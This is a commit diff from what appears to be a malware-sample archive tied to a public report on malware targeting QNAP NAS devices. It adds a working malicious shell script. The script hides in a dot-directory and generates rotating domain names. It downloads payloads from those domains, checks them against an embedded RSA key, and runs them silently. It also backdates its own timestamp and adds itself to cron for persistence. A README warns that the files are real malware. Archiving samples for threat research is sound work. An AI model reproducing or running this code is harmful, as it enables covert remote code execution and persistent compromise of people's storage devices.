2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
XEOF
|
||||
chmod 755 "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
touch -cr /bin/busybox "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "${bdir}/.qpkg/.liveupdate/liveupdate.sh" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
fi
|
||||
|
||||
test -x "${bdir}/.qpkg/.liveupdate/liveupdate.sh" || chmod 755 "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
|
||||
crontabargs=$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\(.\+\)/\1/p')
|
||||
trycount=10; trycount=$(( $trycount - 10 ))
|
||||
set x $crontabargs; shift
|
||||
while [ $# -gt 0 ] && [ $trycount -lt 10 ]; do
|
||||
trycount=$(( $trycount + 1 ))
|
||||
getopts ':c:' OPT 2>/dev/null
|
||||
test "$OPT" = 'c' && crontabfile="${OPTARG}/admin" && break
|
||||
test "$OPTIND" -gt 0 && shift "$OPTIND" && OPTIND=1 || break
|
||||
done
|
||||
test "$crontabfile" && test -f "${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
|
||||
|
||||
for crontab in "$crontabfile" "${confdir}/crontab"; do
|
||||
if $fgrep "${bdir}/.qpkg/.liveupdate/liveupdate.sh" "$crontab"; then
|
||||
:
|
||||
else
|
||||
cronmins=$(printf '%i' "$(( $RANDOM % 60 ))")
|
||||
cronhour=$(printf '%i' "$(( $RANDOM % 24 ))")
|
||||
cronhour=$(printf '%i,' "$(( ( $cronhour + 8 ) % 24 ))" "$(( ( $cronhour + 16 ) % 24 ))")"$cronhour"
|
||||
echo "$cronmins $cronhour"' * * * '"${bdir}/.qpkg/.liveupdate/liveupdate.sh >/dev/null 2>/dev/null" >> "$crontab"
|
||||
crontab "$crontab"
|
||||
sleep 2
|
||||
fi
|
||||
done
|
||||
) & ) &
|
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/fa3c2f8e3309ee67e7684abc6602eea0d1d18d5d799a266209ce594947269346
Normal file
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/fa3c2f8e3309ee67e7684abc6602eea0d1d18d5d799a266209ce594947269346
Normal file
File diff suppressed because one or more lines are too long
@ -4,7 +4,7 @@ ATTENTION: This repository contains actual malware, do not execute any of these
|
||||
|
||||
They have been renamed for easier processing.
|
||||
|
||||
This is an ongoing and updated archive of files that we collect which are associated with specific public reports. If there is a report that is released which we haven't yet covered with related IOCs please feel free to put in a request!
|
||||
This is an ongoing and updated archive of files that we collect which are associated with specific public malicious threat reports. If there is a report that is released which we haven't yet covered with related IOCs please feel free to put in a request!
|
||||
|
||||
All of the malware samples contained in this repository has been collected by various locations. This repository is designed to try to stay up to date with various public reports and to make the process of retreiving the files associated with this reports (tied to the published IOCs) more easily.
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user